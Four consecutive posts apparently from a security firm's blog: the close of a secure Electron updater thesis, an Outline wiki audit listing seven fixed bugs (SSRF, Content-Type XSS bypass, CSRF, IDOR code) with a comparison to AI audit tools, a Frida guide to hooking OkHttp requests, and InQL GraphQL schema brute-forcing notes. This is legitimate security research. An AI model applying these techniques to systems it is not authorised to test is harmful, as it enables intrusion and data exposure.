An untested version attack occurs when an attacker causes the client to install a development, pre-production, or experimental version of the application (e.g., alpha or beta) instead of a stable production release. This typically occurs when development and production releases are not cryptographically separated, for example when the same signing keys or update channels are shared across environments.

Although such versions may be signed, they often contain unreviewed features, experimental dependencies, or debug functionality that introduces new vulnerabilities.

Attack Steps:

The attacker intercepts the update request.
A signed but non-production version is served.
The client installs the update without distinguishing between environments.

This behavior makes the client fail to distinguish between production and non-production releases at a cryptographic or policy level.

SafeUpdater

Our SafeUpdater is built around a set of core security mechanisms designed to protect the update process against the impact of attacks such as downgrade attacks, integrity violations, man-in-the-middle interference, and local race conditions. Each mechanism addresses a specific set of threats identified in the threat model.

The updater is designed to integrate with Electron Builder for application builds; however, this integration is optional, as the manifest can be generated independently.

1. Ed25519 Signature Verification

All update components are cryptographically signed using Ed25519, a modern elliptic-curve signature known for its strong security guarantees. By verifying signatures using a public key embedded in the application, SafeUpdater ensures that update manifests and binaries are from a trusted source and haven’t been tampered with. Any modification to a signed file makes the signature check fail, causing the update to be rejected.

The deterministic message signing is composed of:

SHA-256(file) + version

This prevents unauthorized downgrade attacks by cryptographically binding the update to a specific version identifier.

Once the update asset is received, a signing message is generated. This message will later be used to verify the corresponding signature file:

async function generateMessage(updatePackagePath, version) {
  const hash = await _getFileHash(updatePackagePath);
  const messageString = `${Buffer.from(hash).toString('hex')}-${version}`;
  
  return Buffer.from(messageString);
}

After generating the message, it is compared against the signature provided alongside the update file. The verification uses the public key associated with the application’s signing infrastructure. If the signature does not match, the update is rejected, preventing malicious modifications from being applied:

export async function verify(publicKeyBuffer, messageBuffer, signatureBuffer) {
  return ed.verify(signatureBuffer, messageBuffer, publicKeyBuffer);
}

2. SHA-512 Integrity Checks

In addition to signature verification, SafeUpdater checks the SHA-512 hash on the downloaded update binaries. The expected hash is stored in the signed update manifest and compared against the hash of the downloaded file. This layered approach ensures end-to-end integrity, protects against accidental corruption as well as intentional binary tampering during transmission or storage.

// Verify file integrity
const computedHash = createHash('sha512').update(fileContents).digest('base64');
if (computedHash !== expectedSHA512) {
  throw new Error('Integrity check failed');
}

3. Immutable Version Manifests

Update metadata is distributed through an immutable version manifest that describes available releases, including version numbers, file locations, and cryptographic hashes. Since these manifests are signed, this prevents manifest tampering if the attacker is trying to reintroduce vulnerable versions or pointing them to a malicious location.

4. Secure Temporary File Handling

To mitigate local attacks such as race conditions (TOCTOU vulnerabilities), SafeUpdater stores temporary update files in restricted directories with owner-only permissions. Verification and installation operate on the same file path, which limits opportunities for tampering. However, these steps are not fully atomic (for example, they do not verify and install using the same file descriptor), so complete elimination of time-of-check to time-of-use risks is not guaranteed.

Update Flow Overview

SafeUpdater ensures secure and reliable updates for Electron applications. This update lifecycle follows a structured process from version check to installation:

1. Start & Scheduling

The application schedules periodic polling for updates
An initial update check is triggered immediately on launch

2. Checking for Updates

Fetch the manifest from the server
Verify the manifest’s signature to ensure authenticity
Parse available versions, and if downgrades are allowed, show a version selection UI
Fetch the metadata for the selected version
Download and verify the metadata signature
Parse metadata to extract files, SHA-512 hashes and vendor-specific information
Return the update information or determine no update is needed
If explicitly enabled by the developer for operational or recovery purposes, a controlled version selection UI is presented to allow authorized downgrades

3. Downloading Updates

Check the cache for existing update files
Verify cached files using SHA-512 hashes
If needed, download update files from the server:
- Update package (ZIP or DMG)
- Signature file
Write files to a temporary directory with write permissions only for the owner
Return update file path and signature for verification

4. Verifying Signatures

Load the public key from configuration
Compute a SHA-256 hash of the update file
Construct a signature message: ${sha256Hex}-${version}
Verify the Ed25519 signature against the message
Reject the update if the signature is invalid

5. Installing the Update

Determine whether installation is silent or interactive
Call platform-specific installUpdate() logic:
- macOS: write feed JSON and trigger autoUpdater
Wait for user confirmation or automatically apply the update
Restart the application with the new version

Configuration

SafeUpdater is highly configurable through environment-based JSON files using the config package.

The primary configuration file config/default.json includes the following settings:

1. updatesPublicKey (required)

The Ed25519 public key used to verify update signatures. This key must be hex-encoded (64 hex characters).

{
  "updatesPublicKey": "<..>"
}

Note: You can generate the key using the generateKeys.js script from the tools folder:

node tools/generateKeys.js  # Outputs public.key
cat public.key

2. updatesUrl (required)

The base URL for your update server. SafeUpdater constructs paths for manifests and binaries automatically:

{
  "updatesUrl": "https://updates.yourcompany.com"
}

Path construction examples:

Releases manifest: ${updatesUrl}/releases/versions.json
Version metadata: ${updatesUrl}/releases/${version}/${version}.yml
Update binaries: ${updatesUrl}/releases/${version}/${filename}

3. updatesEnabled (required)

A master switch for the update system:

{
  "updatesEnabled": true
}

4. certificateAuthority (optional)

Provide a PEM-encoded X.509 certificate for TLS validation. This is useful for self-signed certificates during development or as part of a certificate pinning strategy in production.

{
  "certificateAuthority": "-----BEGIN CERTIFICATE-----\nMIIDXTCCAkWgAwIBAgIJAKL...\n-----END CERTIFICATE-----"
}

5. allowInsecureTLS (optional, default: false)

Disables TLS certificate validation.

{
  "allowInsecureTLS": true
}

Warning: Never use this in production! Only for development environments with self-signed certificates.

6. downgradeEnabled (optional, default: `false`)

Enables the ability to roll back to a previous version of the app.

{
  "downgradeEnabled": true
}

Allows cryptographically verified downgrades and enforces a minimum version to prevent unsafe rollbacks.

Update Server

For debugging purposes only, we have developed a set of tools under the /tools folder, which provides all tools required to generate the Ed25519 key pairs, sign release artifacts, and produce signed manifests.

This repository allows developers to:

Generate a long-term Ed25519 key pair for signing releases.
Sign all application binaries, metadata, and manifest files.
Organize and host updates in a structured release directory, ensuring the updater can verify both the signature and integrity of every file.
Run a development HTTPS server to safely test update delivery before production.

By following the two-step process below, SafeUpdater ensures that end users only receive verified, unmodified updates, protecting against downgrade attacks, tampering, or malicious binaries.

1. Sign Version Manifest & Files

Sign release artifacts after building your application using electron-builder. It is crucial to sign every artifact that will be downloaded or trusted by the updater.

# Sign ZIP file
node tools/sign.js /path/to/my-app-2.0.0-mac.zip "2.0.0"

# Sign DMG file
node tools/sign.js /path/to/my-app-2.0.0.dmg "2.0.0"

# Sign YAML metadata
node tools/sign.js /path/to/2.0.0.yml "2.0.0"

2. Server Deployment

For local testing, you can serve updates over HTTPS using a self-signed certificate.

server.py:

from http.server import HTTPServer, SimpleHTTPRequestHandler
import ssl

port = 443

httpd = HTTPServer(('0.0.0.0', port), SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(
    httpd.socket,
    keyfile='key.pem',
    certfile='server.pem',
    server_side=True
)

print(f"Server running on https://0.0.0.0:{port}")
httpd.serve_forever()

This server is intended strictly for development and testing purposes. In production, deploy behind a properly secured, scalable, and monitored infrastructure.

Conclusion

Even when using modern and widely adopted frameworks, software update mechanisms must compensate for several shortcomings introduced by the underlying operating systems themselves. These limitations place a non-trivial burden on application developers, who are often forced to re-implement critical security guarantees that should ideally be enforced at the platform level.

This project set out to analyze the current limitations of software update mechanisms in ElectronJS and to propose a safer alternative to the approaches commonly used today. By providing strong cryptographic guarantees and a well-defined, transparent update flow, our reference implementation (SafeUpdater) aims to reduce the attack surface associated with software updates and to make secure design choices the default rather than an afterthought. In doing so, it allows developers to focus on building application features without compromising on update security.

SafeUpdater was developed as part of my university thesis at the Polytechnic University of Valencia and during my internship at Doyensec. While the project would still require extensive performance evaluation, security auditing, and real-world testing before being considered production-ready, we believe it offers a solid foundation and a practical starting point for building more robust and trustworthy software update mechanisms for ElectroJs-based applications.

Auditing Outline. Firsthand lessons from comparing manual testing and AI security platforms

2026-02-03T00:00:00+01:00

In July 2025, we performed a brief audit of Outline - an OSS wiki similar in many ways to Notion. This activity was meant to evaluate the overall posture of the application, and involved two researchers for a total of 60 person-days. In parallel, we thought it would be a valuable firsthand experience to use three AI security platforms to perform an audit on the very same codebase. Given that all issues are now fixed, we believe it would be interesting to provide an overview of our effort and a few interesting findings and considerations.

"Generate an image that well describes the content of this blog post"

Disclaimer: Outline

While this activity was not sufficient to evaluate the entirety of the Outline codebase, we believe we have a good understanding of its quality and resilience. The security posture of the APIs was found to be above industry best practices. Despite our findings, we were pleased to witness a well-thought-out use of security practices and hardening, especially given the numerous functionalities and integrations available.

It is important to note that Doyensec audited only Outline OSS (v0.85.1). On-premise enterprise and cloud functionalities were considered out of scope for this engagement. For instance, multi-tenancy is not supported in the OSS on-prem release, hence authorization testing did not consider cross-tenant privilege escalations. Finally, testing focused on Outline code only, leaving all dependencies out of scope. Ironically, several of the bugs discovered were actually caused by external libraries.

Disclaimer: AI platforms evaluated during this dry run

Large Language Models and AI security platforms are evolving at an exceptionally rapid pace. The observations, assessments, and experiences shared in this post reflect our hands-on exposure at a specific point in time and within a particular technical context. As models, tooling, and defensive capabilities continue to mature, some details discussed here may change or become irrelevant.

Instrumentation

When performing an in-depth engagement, it is ideal to set up a testing environment with debugging capabilities for both frontend and backend. Outline’s extensive documentation makes this process easy.

We started by setting up a local environment as documented in this guide, and executing the following commands:

echo "127.0.0.1 local.outline.dev" | sudo tee -a /etc/hosts
mkdir files

The following .env file was used for the configuration(non-empty settings only):

NODE_ENV=development
URL=https://local.outline.dev:3000
PORT=3000
SECRET_KEY=09732bbde65d4...989
UTILS_SECRET=af7b3d5a6cc...2f1
DEFAULT_LANGUAGE=en_US
DATABASE_URL=postgres://user:pass@127.0.0.1:5432/outline
REDIS_URL=redis://127.0.0.1:6379
FILE_STORAGE=local
FILE_STORAGE_LOCAL_ROOT_DIR=./files/
FILE_STORAGE_UPLOAD_MAX_SIZE=262144000
FORCE_HTTPS=true
OIDC_CLIENT_ID=web
OIDC_CLIENT_SECRET=secret
OIDC_AUTH_URI=http://127.0.0.1:9998/auth
OIDC_TOKEN_URI=http://127.0.0.1:9998/oauth/token
OIDC_USERINFO_URI=http://127.0.0.1:9998/userinfo
OIDC_DISABLE_REDIRECT=true
OIDC_USERNAME_CLAIM=preferred_username
OIDC_DISPLAY_NAME=OpenID Connect
OIDC_SCOPES=openid profile email
RATE_LIMITER_ENABLED=true
# –––––––––––––  DEBUGGING  ––––––––––––
ENABLE_UPDATES=false
DEBUG=http
LOG_LEVEL=debug

Zitadel’s OIDC server was used for authentication

REDIRECT_URI=https://local.outline.dev:3000/auth/oidc.callback USERS_FILE=./users.json go run github.com/zitadel/oidc/v3/example/server

Finally, VS Code debugging was set up using the following .vscode/launch.json

{
  "version": "0.2.0",
  "configurations": [
    {
      "type": "node",
      "request": "attach",
      "name": "Attach to Outline Backend",
      "address": "localhost",
      "port": 9229,
      "restart": true,
      "protocol": "inspector",
      "skipFiles": ["<node_internals>/**"],
      "cwd": "${workspaceFolder}"
    }
  ]
} 

We also facilitated front-end debugging by adding the following setting at the top of the .babelrc file in order to have source maps.

"sourceMaps": true

Findings

Doyensec researchers discovered and reported seven (7) unique vulnerabilities affecting Outline OSS.

ID	Title	Class	Severity	Discoverer
OUT-Q325-01	Multiple Blind SSRF	SSRF	Medium	🤖🙍‍♂️
OUT-Q325-02	Vite Path Traversal	Injection Flaws	Low	🙍‍♂️
OUT-Q325-03	CSRF via Sibling Domains	CSRF	Medium	🙍‍♂️
OUT-Q325-04	Local File Storage CSP Bypass	Insecure Design	Low	🙍‍♂️
OUT-Q325-05	Insecure Comparison in VerificationCode	Insufficient Cryptography	Low	🤖🙍‍♂️
OUT-Q325-06	ContentType Bypass	Insecure Design	Medium	🙍‍♂️
OUT-Q325-07	Event Access	IDOR	Low	🤖

Among the bugs we discovered, there are a few that require special mention:

OUT-Q325-01 (GHSA-jfhx-7phw-9gq3) is a standard Server-Side Request Forgery bug allowing redirects, but having limited protocols support. Interestingly, this issue affects the self-hosted version only as the cloud release is protected using request-filtering-agent. While giving a quick look at this dependency, we realized that versions 1.x.x and earlier contained a vulnerability (GHSA-pw25-c82r-75mm) where HTTPS requests to 127.0.0.1 bypass IP address filtering, while HTTP requests are correctly blocked. While newer versions of the library were already out, Outline was still using an old release, since no GitHub (or other) advisories were ever created for this issue. Whether intentionally or accidentally, this issue was silently fixed for many years.

OUT-Q325-02 (GHSA-pp7p-q8fx-2968) turned out to be a bug in the vite-plugin-static-copy npm module. Luckily, it only affects Outline in development mode.

OUT-Q325-04 (GHSA-gcj7-c9jv-fhgf) was already exploited in this type confusion attack. In fact, browsers like Chrome and Firefox do not block script execution even if the script is served with Content-Disposition: attachment as long as the content type is a valid application/javascript. Please note that this issue does not affect the cloud-hosted version given it’s not using the local file storage engine altogether.

Investigating this issue led to the discovery of OUT-Q325-06, an even more interesting issue.

Outline allows inline content for specific (safe) types of files as defined in server/storage/files/BaseStorage.ts

  /**
   * Returns the content disposition for a given content type.
   *
   * @param contentType The content type
   * @returns The content disposition
   */
  public getContentDisposition(contentType?: string) {
    if (!contentType) {
      return "attachment";
    }

    if (
      FileHelper.isAudio(contentType) ||
      FileHelper.isVideo(contentType) ||
      this.safeInlineContentTypes.includes(contentType)
    ) {
      return "inline";
    }

    return "attachment";
  }

Despite this logic, the actual content type of the response was getting overridden. All Outline versions before v0.84.0 (May 2025) were actually vulnerable to Cross-Site Scripting because of this issue, and it was accidentally mitigated by adding the following CSP directive:

ctx.set("Content-Security-Policy","sandbox");

When analyzing the root cause, it turned out to be an undocumented insecure behavior of KoaJS.

In Outline, the issue was caused by forcing the expected “Content-Type” before the use of response.attachment([filename], [options]) .

ctx.set("Content-Type", contentType);
ctx.attachment(fileName, {
      type: forceDownload
        ? "attachment"
        : FileStorage.getContentDisposition(contentType), // this applies the safe allowed-list
    });

In fact, the attachment function performs an unexpected:

  set type (type) {
  type = getType(type)
  if (type) {
    this.set('Content-Type', type)
  } else {
    this.remove('Content-Type')
  }
},

This insecure behavior is neither documented nor warned against by the framework. Inverting ctx.set and ctx.attachment is sufficient to fix the issue.

Combining OUT-Q325-03, OUT-Q325-06 and Outline’s sharing capabilities, it is possible to take over an admin account, as shown in the following video, affecting the latest version of Outline at the time of testing:

Your browser does not support the video tag.

Finally, OUT-Q325-07 (GHSA-h9mv-vg9r-8c7c) was discovered autonomously by a security AI platform. The events.list API endpoint contains an IDOR vulnerability allowing users to view events for any actor or document within their team without proper authorization.

router.post(
  "events.list",
  auth(),
  pagination(),
  validate(T.EventsListSchema),
  async (ctx: APIContext<T.EventsListReq>) => {
    const { user } = ctx.state.auth;
    const {
      name,
      events,
      auditLog,
      actorId,
      documentId,
      collectionId,
      sort,
      direction,
    } = ctx.input.body;

    let where: WhereOptions<Event> = {
      teamId: user.teamId,
    };

    if (auditLog) {
      authorize(user, "audit", user.team);
      where.name = events
        ? intersection(EventHelper.AUDIT_EVENTS, events)
        : EventHelper.AUDIT_EVENTS;
    } else {
      where.name = events
        ? intersection(EventHelper.ACTIVITY_EVENTS, events)
        : EventHelper.ACTIVITY_EVENTS;
    }

    if (name && (where.name as string[]).includes(name)) {
      where.name = name;
    }

    if (actorId) {
      where = { ...where, actorId };
    }

    if (documentId) {
      where = { ...where, documentId };
    }

    if (collectionId) {
      where = { ...where, collectionId };

      const collection = await Collection.findByPk(collectionId, {
        userId: user.id,
      });
      authorize(user, "read", collection);
    } else {
      const collectionIds = await user.collectionIds({
        paranoid: false,
      });
      where = {
        ...where,
        [Op.or]: [
          {
            collectionId: collectionIds,
          },
          {
            collectionId: {
              [Op.is]: null,
            },
          },
        ],
      };
    }

    const loadedEvents = await Event.findAll({
      where,
      order: [[sort, direction]],
      include: [
        {
          model: User,
          as: "actor",
          paranoid: false,
        },
      ],
      offset: ctx.state.pagination.offset,
      limit: ctx.state.pagination.limit,
    });

    ctx.body = {
      pagination: ctx.state.pagination,
      data: await Promise.all(
        loadedEvents.map((event) => presentEvent(event, auditLog))
      ),
    };
  }
);

While the code implements team-level isolation (via the teamId check) and collection-level authorization, it fails to validate access to individual events. An attacker can manipulate the actorId or documentId parameters to view events they shouldn’t have access to. This is particularly concerning since audit log events might contain sensitive information (e.g., document titles). This is a nice catch, something that is not immediately evident to a human auditor without an extended understanding of Outline’s authorization model.

On the Use of AI tools

Despite the discovery of OUT-Q325-07, our experience using three AI security platforms was, overall, rather disappointing. LLM-based models can identify some vulnerabilities; however, the rate of false positives vastly outweighed the few true positives. What made this especially problematic was how convincing the findings were: the descriptions of the alleged issues were often extremely accurate and well-articulated, making it surprisingly hard to confidently dismiss them as false positives. As a result, cleaning up and validating all AI-reported issues turned into a 40-hour effort.

Such overhead during a paid manual audit is hard to justify for us and, more importantly, for our clients. AI hallucinations repeatedly sent us down unexpected rabbit holes, at times making seasoned consultants, with decades of combined experience, feel like complete newbies. While attempting to validate alleged bugs reported by AI, we found ourselves second-guessing our own judgment, losing valuable time that could have been spent on higher-impact tasks.

While the future undoubtedly involves LLMs, it is not quite here yet for high-quality security engagements targeting popular, well-audited software. At Doyensec, we will continue to explore and experiment with AI-assisted tooling, adopting it when and where it actually adds value. We don’t want to be remembered as anti-AI hypers but we’re equally not interested in outsourcing our expertise to confident-sounding hallucinations. For now, human intuition, experience, and skepticism - combined with top-notch tooling - remain very hard to beat. Challenge us!

Intercepting OkHttp at Runtime With Frida - A Practical Guide

2026-01-22T00:00:00+01:00

Introduction

OkHttp is the defacto standard HTTP client library for the Android ecosystem. It is therefore crucial for a security analyst to be able to dynamically eavesdrop the traffic generated by this library during testing. While it might seem easy, this task is far from trivial. Every request goes through a series of mutations between the initial request creation and the moment it is transmitted. Therefore, a single injection point might not be enough to get a full picture. One needs a different injection point to find out what is actually going through the wire, while another might be required to understand the initial payload being sent.

In this tutorial we will demonstrate the architecture and the most interesting injection points that can be used to eavesdrop and modify OkHttp requests.

Premise

For the purpose of demonstration, I built a simple APK with a flow similar to the app I recently tested. It first creates a Request with a JSON payload. Then, a couple of interceptors perform the following operations:

Add an authorization header
Calculate the payload signature, adding that as a header
Encrypt the JSON payload and switch the body to the encrypted version

Looking at this flow it becomes obvious how reversing the actual application protocol isn’t straightforward. Intercepting requests at the moment of actual sending will yield the actual payload being sent over the wire, however it will obscure the JSON payload. Intercepting the request creation, on the other hand, will reveal the actual JSON, but will not reveal custom HTTP headers, authentication token, nor will it allow replaying the request.

In the following examples, I’ll demonstrate two approaches that can be mixed and matched for a full picture. Firstly, I will hook the realCall function and dump the Request from there. Then, I will demonstrate how to follow the consecutive Request mutations done by the Interceptors. However, in real life scenarios hooking every Interceptor implementation might be impractical, especially in obfuscated applications. Instead, I’ll demonstrate how to observe intercept results from an internal RealInterceptorChain.proceed function.

Helper Functions

To reliably print the contents of the requests, one needs to prepare the helper functions first. Assuming we have an okhttp3.Request object available, we can use Frida to dump its contents:

    function dumpRequest(req, function_name) {
        try {
            console.log("\n=== " + function_name + " ===");
            console.log("method: " + req.method());
            console.log("url: " + req.url().toString());
            console.log("-- headers --");
            dumpHeaders(req);
            dumpBody(req);
            console.log("=== END ===\n");
        } catch (e) {
            console.log("dumpRequest failed: " + e);
        }
    }

Dumping headers requires iterating through the Header collection:

function dumpHeaders(req) {
    const headers = req.headers();
    try {
        if (!headers) return;

        const n = headers.size();
        for (let i = 0; i < n; i++) {
            console.log(headers.name(i) + ": " + headers.value(i));
        }
    } catch (e) {
        console.log("dumpHeaders failed: " + e);
    }
}

Dumping the body is the hardest task, as there might be many different RequestBody implementations. However, in practice the following should usually work:

function dumpBody(req) {
    const body = req.body();
    if (body) {
        const ct = body.contentType();
        console.log("-- body meta --");
        console.log("contentType: " + (ct ? ct.toString() : "(null)"));
        try {
            console.log("contentLength: " + body.contentLength());
        } catch (_) {
            console.log("contentLength: (unknown)");
        }

        const utf8 = readBodyToUtf8(body);
        if (utf8 !== null) {
            console.log("-- body (utf8) --");
            console.log(utf8);
        } else {
            console.log("-- body -- (not readable: streaming/one-shot/duplex or custom)");
        }
    } else {
        console.log("-- no body --");
    }
}

The code above uses another helper function to read the actual bytes from the body and decode it as UTF-8. It does it by utilizng the okio.Buffer function:

function readBodyToUtf8(reqBody) {
    try {
        if (!reqBody) return null;

        const Buffer = Java.use("okio.Buffer");
        const buf = Buffer.$new();

        reqBody.writeTo(buf);

        const out = buf.readUtf8();
        return out;
    } catch (e) {
        return null;
    }
}

RealCall

Now that we have code capable of dumping the request as text, we need to find a reliable way to catch the requests. When attempting to view an outgoing communication, the first instinct is to try and inject the function called to send the request. In the world of OkHttp, the functions closest to this are RealCall.execute() and RealCall.enqueue():

Java.perform (function() {
    try {
        const execOv = RealCall.execute.overload().implementation = function () {
            dumpRequest(this.request(), "RealCall.execute() about to send");
            return execOv.call(this);
        };
        console.log("[+] Hooked RealCall.execute()");
    } catch (e) {
        console.log("[-] Failed to hook RealCall.execute(): " + e);
    }

    try {
        const enqOv = RealCall.enqueue.overload("okhttp3.Callback").implementation = function (cb) {
            dumpRequest(this.request(), "RealCall.enqueue()");
            return enqOv.call(this, cb);
        };
        console.log("[+] Hooked RealCall.enqueue(Callback)");
    } catch (e) {
        console.log("[-] Failed to hook RealCall.enqueue(): " + e);
    }
});

However, after running these hooks, it becomes clear that this approach is insufficient whenever an application uses interceptors:

frida -U -p $(adb shell pidof com.doyensec.myapplication) -l blogpost/request-body.js
     ____
    / _  |   Frida 17.5.1 - A world-class dynamic instrumentation toolkit
   | (_| |
    > _  |   Commands:
   /_/ |_|       help      -> Displays the help system
   . . . .       object?   -> Display information about 'object'
   . . . .       exit/quit -> Exit
   . . . .
   . . . .   More info at https://frida.re/docs/home/
   . . . .
   . . . .   Connected to CPH2691 (id=8c5ca5b0)
Attaching...
[+] Using OkHttp3.internal.connection.RealCall
[+] Hooked RealCall.execute()
[+] Hooked RealCall.enqueue(Callback)
[*] Non-obfuscated RealCall hooks installed.
[CPH2691::PID::9358 ]->
=== RealCall.enqueue() about to send ===
method: POST
url: https://tellico.fun/endpoint
-- headers --
-- body meta --
contentType: application/json; charset=utf-8
contentLength: 60
-- body (utf8) --
{
  "hello": "world",
  "poc": true,
  "ts": 1768598890661
}
=== END ===

As can be observed, this approach was useful to disclose the address and the JSON payload. However, the request is far from complete. The custom and authentication headers are missing, and the analyst cannot observe that the payload is later encrypted, making it impossible to infer the full application protocol. Therefore, we need to find a more comprehensive method.

Intercepting Interceptors

Since the modifications are performed inside the OkHttp Interceptors, our next injection target will be the okhttp3.internal.http.RealInterceptorChain class. Given that this is an internal function, it’s bound to be less stable than regular OkHttp classes. Therefore, instead of hooking a function with a single signature, we’ll iterate all overloads of RealInterceptorChain.proceed:

const Chain = Java.use("okhttp3.internal.http.RealInterceptorChain");
console.log("[+] Found okhttp3.internal.http.RealInterceptorChain");

if (Chain.proceed) {
    const ovs = Chain.proceed.overloads;
    for (let i = 0; i < ovs.length; i++) {
        const proceed_overload = ovs[i];
        console.log("[*] Hooking RealInterceptorChain.proceed overload: " + proceed_overload.argumentTypes.map(t => t.className).join(", "));
        proceed_overload.implementation = function () {
            // implementation override here
        };
    }
    console.log("[+] Hooked RealInterceptorChain.proceed(*)");
} else {
    console.log("[-] RealInterceptorChain.proceed not found (unexpected)");
}

To understand the code inside the implementation, we need to understand how the proceed functions work. The RealInterceptorChain function maintains the entire chain. When proceed is called by the library (or previous Interceptor) the this.index value is incremented and the next Interceptor is taken from the collection and applied to the Request. Therefore, at the moment of the proceed call, we have a state of Request that is the result of a previous Interceptor call. So, in order to properly assign Request states to proper Interceptors, we’ll need to take a name of an Interceptor number index - 1:

proceed_overload.implementation = function () {
    // First arg is Request in all proceed overloads.
    const req = arguments[0];
    // Get current index
    const idx = this.index.value;
    // Get previous interceptor name 
    // Previous interceptor is the one responsible for the current req state
    var interceptorName = "";
    if (idx == 0) {
        interceptorName = "Original request";
    } else {
        interceptorName = "Interceptor " + this.interceptors.value.get(idx-1).getClass().getName();
    }
    dumpRequest(req, interceptorName);
    // Call the actual proceed
    return proceed_overload.apply(this, arguments);
};

The example result will look similar to the following:

[*] Hooking RealInterceptorChain.proceed overload: OkHttp3.Request
[+] Hooked RealInterceptorChain.proceed(*)
[+] Hooked OkHttp3.Interceptor.intercept(Chain)
[*] RealCall hooks installed.
[CPH2691::PID::19185 ]->
=== RealCall.enqueue() ===
method: POST
url: https://tellico.fun/endpoint
-- headers --
-- body meta --
contentType: application/json; charset=utf-8
contentLength: 60
-- body (utf8) --
{
  "hello": "world",
  "poc": true,
  "ts": 1768677868986
}
=== END ===


=== Original request ===
method: POST
url: https://tellico.fun/endpoint
-- headers --
-- body meta --
contentType: application/json; charset=utf-8
contentLength: 60
-- body (utf8) --
{
  "hello": "world",
  "poc": true,
  "ts": 1768677868986
}
=== END ===


=== Interceptor com.doyensec.myapplication.MainActivity$HeaderInterceptor ===
method: POST
url: https://tellico.fun/endpoint
-- headers --
X-PoC: frida-test
X-Device: android
Content-Type: application/json
-- body meta --
contentType: application/json; charset=utf-8
contentLength: 60
-- body (utf8) --
{
  "hello": "world",
  "poc": true,
  "ts": 1768677868986
}
=== END ===


=== Interceptor com.doyensec.myapplication.MainActivity$SignatureInterceptor ===
method: POST
url: https://tellico.fun/endpoint
-- headers --
X-PoC: frida-test
X-Device: android
Content-Type: application/json
X-Signature: 736c014442c5eebe822c1e2ecdb97c5d
-- body meta --
contentType: application/json; charset=utf-8
contentLength: 60
-- body (utf8) --
{
  "hello": "world",
  "poc": true,
  "ts": 1768677868986
}
=== END ===


=== Interceptor com.doyensec.myapplication.MainActivity$EncryptBodyInterceptor ===
method: POST
url: https://tellico.fun/endpoint
-- headers --
X-PoC: frida-test
X-Device: android
Content-Type: application/json
X-Signature: 736c014442c5eebe822c1e2ecdb97c5d
X-Content-Encryption: AES-256-GCM
X-Content-Format: base64(iv+ciphertext+tag)
-- body meta --
contentType: application/octet-stream
contentLength: 120
-- body (utf8) --
YIREhdesuf1VdvxeCO+H/8/N8NYFJ2r5Jk4Im40fjyzVI2rzufpejFOHQ67hkL8UFdniknpABmjoP73F2Z4Vbz3sPAxOp7ZXaz5jWLlk3T6B5sm2QCAjKA==
=== END ===

...

With such output we can easily observe the consecutive mutations of the request: the initial payload, the custom headers being added, the X-Signature being added and finally, the payload encryption. With the proper Interceptor names an analyst also receives strong signals as to which classes to target in order to reverse-engineer these operations.

Conclusion

In this post we walked through a practical approach to dynamically intercept OkHttp traffic using Frida.

We started by instrumenting RealCall.execute() and RealCall.enqueue(), which gives quick visibility into endpoints and plaintext request bodies. While useful, this approach quickly falls short once applications rely on OkHttp interceptors to add authentication headers, calculate signatures, or encrypt payloads.

By moving one level deeper and hooking RealInterceptorChain.proceed(), we were able to observe the request as it evolves through each interceptor in the chain. This allowed us to reconstruct the full application protocol step by step - from the original JSON payload, through header enrichment and signing, then all the way to the final encrypted body sent over the wire.

This technique is especially useful during security assessments, where understanding how a request is built is often more important than simply seeing the final bytes on the network. Mapping concrete request mutations back to specific interceptor classes also provides clear entry points for reverse-engineering custom cryptography, signatures, or authorization logic.

In short, when dealing with modern Android applications, intercepting OkHttp at a single point is rarely sufficient. Combining multiple injection points — and in particular leveraging the interceptor chain — provides the visibility needed to fully understand and manipulate application-level protocols.

InQL v6.1.0 Just Landed with New Features and Contribution Swag! 🚀

2025-12-02T00:00:00+01:00

Introduction

We are excited to announce a new release of our Burp Suite Extension - InQL v6.1.0! The complete re-write from Jython to Kotlin in our previous update (v6.0.0) laid the groundwork for us to start implementing powerful new features, and this update delivers the first exciting batch.

This new version introduces key features like our new GraphQL schema brute-forcer (which abuses “did you mean…” suggestions), server engine fingerprinter, automatic variable generation when sending requests to Repeater/Intruder, and various other quality-of-life and performance improvements.

Key New Features

The GraphQL Schema Brute-Forcer

Until now, InQL was most helpful when a server had introspection enabled or when you already had the GraphQL schema file. With v6.1.0, the tool can now attempt to reconstruct the backend schema by abusing the “did you mean…” suggestions supported by many GraphQL server implementations.

This feature was inspired by the excellent Clairvoyance CLI tool. We implemented a similar algorithm, also based on regular expressions and batch queries. Building this directly into InQL brings it one step closer to being the all-in-one Swiss Army knife for GraphQL security testing, allowing researchers to access every tool they need in one place.

How It Works

When InQL fails to fetch a schema because introspection is disabled, you can now choose to “Launch schema bruteforcer”. The tool will then start sending hundreds of batched queries containing field and argument names guessed from a wordlist.

InQL then analyzes the server’s error messages, by looking for specific errors like Argument 'contribution' is required or Field 'bugs' not found on type 'inql'. It also parses helpful suggestions, such as Did you mean 'openPR'?, which rapidly speeds up discovery. At the same time, it probes the types of found fields and arguments (like String, User, or [Episode!]) by intentionally triggering type-specific error messages.

This process repeats until the entire reachable schema is mapped out. The result is a reconstructed schema, built piece-by-piece from the server’s own validation feedback. All without introspection.

Be aware that the scan can take time. Depending on the schema’s complexity, server rate-limiting, and the wordlist size, a full reconstruction can take anywhere from a few minutes to several hours. We recommend visiting the InQL settings tab to properly set up the scan for your specific target.

Your browser does not support the video tag.

The GraphQL Server Engine Fingerprinter

The new version of InQL is now able to fingerprint the GraphQL engine used by the back-end server. Each GraphQL engine implements slightly different security protections and insecure defaults, opening door for abusing unique, engine-specific attack vectors.

The fingerprinted engine can be looked up in the GraphQL Threat Matrix by Nick Aleks. The matrix is a fantastic resource for confirming which implementation may be vulnerable to specific GraphQL threats.

How It Works

Similarly to the graphw00f CLI tool, InQL sends a series of specific GraphQL queries to the target server and observes how it responds. It can differentiate the specific engines by analyzing the unique nuances in their error messages and responses.

For example, for the following query:

query @deprecated {
    __typename
}

An Apollo server typically responds with an error message stating Directive \"@deprecated\" may not be used on QUERY.. However, a GraphQL Ruby server, will respond with the '@deprecated' can't be applied to queries message.

When InQL successfully fingerprints the engine, it displays details about its implementation right in the UI, based on data from the GraphQL Threat Matrix.

Your browser does not support the video tag.

Automatic Variable Generation (Default Values)

While previous InQL versions were great for analyzing schemas, finding circular references, and identifying points-of-interest, actually crafting a valid query could be frustrating. The tool didn’t handle variables, forcing you to fill them in manually. The new release finally fixes that pain point.

Now, when you use “Send to Repeater” or “Send to Intruder” on a query that requires variables (like a search argument of type String), InQL will automatically populate the request with placeholder values. This simple change significantly improves the speed and flow of testing GraphQL APIs.

Here are the default values InQL will now use:

"String" -> "exampleString"
"Int" -> 42
"Float" -> 3.14
"Boolean" -> true
